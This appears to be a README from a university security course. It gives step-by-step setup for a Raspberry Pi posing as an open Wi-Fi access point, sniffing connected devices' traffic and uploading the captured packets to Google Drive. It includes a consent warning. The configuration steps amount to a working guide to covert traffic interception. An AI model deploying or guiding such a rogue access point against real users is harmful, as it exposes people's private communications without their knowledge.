These programs work together to copy network traffic and back them up to a remote server. They are intended to be run on a Raspberry Pi posing as an open wireless access point.
The code present in this repo was part of work done for a university security course. It is intended for learning and research purposes. Don't use these programs on other people without getting informed consent. It may be illegal to do so in your country.
This tutorial has only been tested on this specific hardware + software. Presumably you can apply this tutorial to similarlly speced hardware with a bit of technical know-how.
- Raspberry Pi 4B
- 4GB RAM
- Raspberry Pi OS Bullseye
- TP-Link Wireless USB Adapter
- TL-WN821N
- Computer with SD card reader
Many tutorials I encountered while working on this project took the easy route of using the in-built wifi card of the Rasberry Pi as the access point and providing an internet connection to the Pi through an ethernet cable. This project differs by using two wifi cards so that the Pi can connect to the internet wirelessly.
If the Raspberry Pi being used has never been set up, visit https://www.raspberrypi.com/software/ to download Raspberry Pi OS (formerly referred to as Raspbian). This tutorial was last verified as working on Raspberry Pi OS Bullseye (11).
Start the Pi and go through the normal set up prompts. If the update that occurs during the set up fails, make sure to run
sudo apt update
and
sudo apt upgrade
from the terminal to ensure all system packages are up to date. Depending on internet connection speeds, this step may take a long time to complete.
The TP-Link Wireless Adapter doesn't work out of the box with the Raspberry Pi. As a result, it is neccessary to install the required drivers manually. If you are following this tutorial with a different adapter you will need to find any neccessary linux drivers on your own. Either way, make sure to insert the USB into the Raspberry Pi if you have not already done so.
If you are using a TL-WN821N, you can visit the following repo and follow the installtion guide before moving on to step 1.3: https://github.com/Mange/rtl8192eu-linux-driver
Regardless of what device you are using, you can check an adapter is detected and functioning by running
iwconfig
and checking the output.
For example:
The USB is inserted, but without the driver it is not recognised by the Raspberry Pi
The USB is inserted, since the driver is installed it is recognised by the Raspberry Pi
If you read the source code for packet_sniffer.c you will notice that all the sniffing occurs on wlan1. wlan1 is the wireless adapter I chose to configure as a wireless access point. It is the adapter to which other devices (like phones or laptops) will connect to once the Pi.neapple is complete.
You can use either you in-built or external wireless adapter as the access point, provided your external adapter support AP mode (the in-built adapter on the Rasberry Pi 4B definitely supports AP mode).
If you need to check AP mode support follow these steps:
- Run
iwconfigto figure out whichwlancorresponds to your external adapter. - Run
iw devand figure out whichphy#Xcorresponds to your external adapter by referencing theirwlanvalue. - Run
iw phy phyX infowhereXis substituted for the number found in step 2 (Don't include the#- e.g.iw phy phy1 info) - Check if
APis listed underSupported interface modes(located near the top of output). If it is, the adapter supports AP mode.
It is worth noting that the titles wlan0 and wlan1 are not directly linked to the hardware of each adapter and is instead just the order in which the operating system detected each adapter. For example, if I start my Raspberry Pi with the USB adapter inserted, it is recognised as wlan0 and the inbuilt adapter is recognised as wlan1.
On the other hand, if I start my Raspberry Pi without the USB adapter inserted, the inbuilt adapter is recognised as wlan0 and (once inserted) the USB is recognised as wlan1.
This tutorial (and the source code) assumes you use the adapter listed as wlan1 as your access point, and the adapter listed as wlan0 as a means of connecting to the internet. If your system requires the inverse assumption, make sure to substitute all instances of wlan0 for wlan1 (and vice-versa) for the remainder of this tutorial and be sure to change line 34 of packet_sniffer.c
Currently, both wlan0 and wlan1 are connecting to the same access point. This will cause problems down the line as wlan1 needs to be configured to accept incoming traffic.
This can be addressed by creating seperate wpa_supplicant.conf files for each adapter.
From the home directory, run:
cat /etc/wpa_supplicant/wpa_supplicant.conf
The output will look something like this:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
country=SOME_COUNTRY_CODE
network={
ssid="YOUR_WIFI_NAME"
psk="YOUR_WIFI_PASSWORD"
}
Copy this output and create the first file wpa_supplicant-wlan0.conf by running the following command:
sudo nano /etc/wpa_supplicant/wpa_supplicant-wlan0.conf
Paste the output you just copied into this file and save it.
Now create the second file wpa_supplicant-wlan1.conf by running the following command:
sudo nano /etc/wpa_supplicant/wpa_supplicant-wlan1.conf
Paste the copied output once again, but before saving, make sure to delete the contents of the network field such that your file will look something like this:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
country=SOME_COUNTRY_CODE
network={
}
Run sudo nano /etc/dhcpcd.conf and append the following lines to the opened file:
interface wlan1
static ip_address=192.168.220.1/24
static routers=192.168.220.0
Now restart DHCPCD by running:
sudo service dhcpcd restart
hostapd allows your network interface card (NIC) to act as an access point for other devices. Install it by running:
sudo apt-get install hostapd
Once installed, run sudo nano /etc/hostapd/hostapd.conf and copy the following into the opened file:
interface=wlan1
hw_mode=g
ssid=pineapple
channel=1
After saving and exiting, now run sudo nano /etc/network/interfaces and append the following to the opened file:
iface wlan1 inet static
hostapd /etc/hostapd/hostapd.conf
The final part of this step is to enable hostapd. Run the following two commands:
sudo systemctl unmask hostapd.service
sudo systemctl enable hostapd.service
dnsmasq allows for dns forwarding. Install it by running:
sudo apt-get install dnsmasq
Backup and rename the default config file by running:
sudo mv /etc/dnsmasq.conf /etc/dnsmasq.conf.orig
Open a new config file by running sudo nano /etc/dnsmasq.conf. Replace the contents of the file with the below:
interface=wlan1
listen-address=192.168.220.1
server=8.8.8.8
domain-needed
bogus-priv
dhcp-range=192.168.220.80,192.168.220.90,12h
It is also necessary to enable packet forwarding. To do so, run:
sudo nano /etc/sysctl.conf
and uncomment this line: net.ipv4.ip_forward=1
The final step is to configure a NAT between wlan0 and wlan1. Do so by running the following commands:
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o wlan1 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan1 -o wlan0 -j ACCEPT
sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
To ensure the iptables are loaded on reboot, run sudo nano /etc/rc.local and add the line iptables-restore < /etc/iptables.ipv4.nat:
Restart your Raspberry Pi by running:
systemctl reboot -i
Once rebooted, run these two commands (in this order) and you should now be able to see your pineapple wifi network and access the internet through it:
sudo service hostapd start
sudo service dnsmasq start
Remember to insert your USB adapter after rebooting if you want it to show up as wlan1
To turn the access point off, just run:
sudo service dnsmasq stop
sudo service hostapd stop
While my repository contains the python script necessary for uploading files to google drive, it requires a token unique to your own google account to work.
If you don't have a google account, make one now at https://accounts.google.com/signup/v2/webcreateaccount?flowName=GlifWebSignIn&flowEntry=SignUp
Once you are logged into google navigate to https://console.cloud.google.com/projectcreate
and create a new project named Pineapple.
Once the project is created (this may take a few minutes) navigate to its dashboard. You can do so via the top left menu bar:
Navigate to the api and services section of you project dashboard:
and then select enable apis and services:
From here, search for and enable the google drive api:
The cloud project requires an oauth consent screen. From the apis and services sidebar navigate to oauth consent screen:
For user type, choose external:
Set the app name and support email to whatever you like and move on to the scopes page. Under add or remove scopes search for google drive and select /auth/drive:
For test users, you just need to add your google account:
Navigate to the credentials window of api and services and create a new oauth client id:
Set the application type as web application:
Make sure to add an authorised redirect URI for http://localhost/:
Creat the credential and download the json file.
Once downloaded move it into the project directory (so that drive_uploader.py can read from it) and rename the file to credentials.json
With the Raspberry Pi and Google Cloud set up, the final piece of preparation involves getting the provided source code ready to be run.
packet_sniffer.c requires the libpcap library. Install it by running:
sudo apt-get install libpcap-dev
From within the project directory run make. This will compile packet_sniffer.c into an executable.
drive_uploader.py requires the google api package. Install it by running:
pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib
You will get warnings that the package is not installed in a directory on PATH. Address this by running the following command:
echo "export PATH=\$PATH:/home/$USER/.local/bin >> ~/.bashrc
Now any new terminal you open will add the location of the google api package to your path
From the project directory, open a new terminal window and run python3 drive_uploader.py. Since this is the first time connecting to the api you need to complete the authentication flow you set up earlier. A window should automatically open. If not follow the URL that appears in the terminal. Once complete the program will crash since the expected directories are not yet present. This is expected behaviour.
With all the set up complete, activating the Pi.neapple is a simple as running a few commands from the project directory.
- Enable hostapd and dnsmasq
sudo service hostapd start
sudo service dnsmasq start
- Activate packet sniffing on wlan1:
sudo ./packet_sniffer
- Activate packet uploading to google drive
python3 upload_manager.py
As network traffic passes through the Raspberry Pi.neapple, the packets being captured by packet_sniffer will be uploaded by drive_uploader.py